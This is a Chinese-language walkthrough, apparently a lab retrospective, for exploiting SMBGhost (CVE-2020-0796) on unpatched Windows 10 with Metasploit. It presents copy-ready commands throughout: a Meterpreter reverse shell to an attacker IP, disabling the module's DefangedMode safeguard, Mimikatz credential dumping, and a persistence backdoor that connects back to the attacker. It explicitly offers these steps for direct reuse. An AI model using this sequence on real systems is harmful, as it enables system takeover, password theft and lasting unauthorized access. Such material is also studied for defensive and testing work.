一、核心信息漏洞名称SMBGhost / CVE-2020-0796目标系统Windows 10 1903/1909 x6410.0.18362.x未打 KB4551762 补丁权限结果直接获取NT AUTHORITY\SYSTEM最高权限关键环境Metasploit Framework攻击机与目标网络互通同一网段二、完整操作流程可直接复制复用# 1. 启动Metasploit msfconsole -q # 2. 加载SMBGhost漏洞模块 use exploit/windows/smb/cve_2020_0796_smbghost # 3. 设置关键参数 set payload windows/x64/meterpreter/reverse_tcp # 稳定的Meterpreter反向Shell set RHOSTS 192.168.1.8 # 目标IP set LHOST 192.168.1.138 # 攻击机IP set DefangedMode false # 关闭安全保护模式允许高危操作 # 4. 验证参数配置 show options # 5. 执行漏洞利用 run三、关键日志解读成功信号日志信息说明Found low stub/PML4/HAL heap...漏洞利用的内核地址定位成功漏洞触发流程正常KUSER_SHARED_DATA PTE NX bit cleared!绕过了系统的 NX 保护payload 注入条件已满足Sending stage (232006 bytes) to 192.168.1.8Meterpreter payload 已成功发送到目标Meterpreter session 2 opened反向连接建立Meterpreter 会话成功创建getuid → NT AUTHORITY\SYSTEM已获取 Windows 系统最高权限四、关键避坑点复盘必看DefangedMode必须关闭模块默认开启该安全模式会阻止高危操作导致利用被强制终止报错提示Disable the DefangedMode option to proceed。Payload 选择优化优先使用windows/x64/meterpreter/reverse_tcp自带心跳保活比普通shell/reverse_tcp更稳定能避免模块后续恢复操作导致的会话误杀。普通 shell 会话容易因 SMB 连接超时被关闭Meterpreter 会话更耐断。目标系统版本必须匹配仅对 Windows 10 1903/1909 x64 有效目标系统版本10.0.18362符合条件且未安装 KB4551762 补丁。蓝屏风险预警该漏洞是内核级漏洞利用后系统内核已被修改目标大概率会在几分钟到几小时内蓝屏重启会话无法长期保持关键操作需一次性完成。五、成功后可执行的核心操作复盘拓展# 1. 基础信息收集 sysinfo # 查看目标系统信息 getuid # 验证当前权限SYSTEM ps # 查看进程列表 netstat -ano # 查看网络连接 # 2. 密码Hash抓取SYSTEM权限下 load kiwi # 加载Mimikatz模块 creds_all # 导出本地用户密码/Hash # 3. 持久化后门可选注意环境限制 run persistence -U -i 5 -p 443 -r 192.168.1.138 # 开机自启后门六、复盘总结本次利用成功的核心是正确关闭了安全模式 选择了稳定的 Meterpreter payload 目标系统版本匹配最终实现了从漏洞触发到 SYSTEM 权限获取的完整流程。后续复现可直接套用上述命令同时重点关注日志中的关键成功信号快速判断利用状态。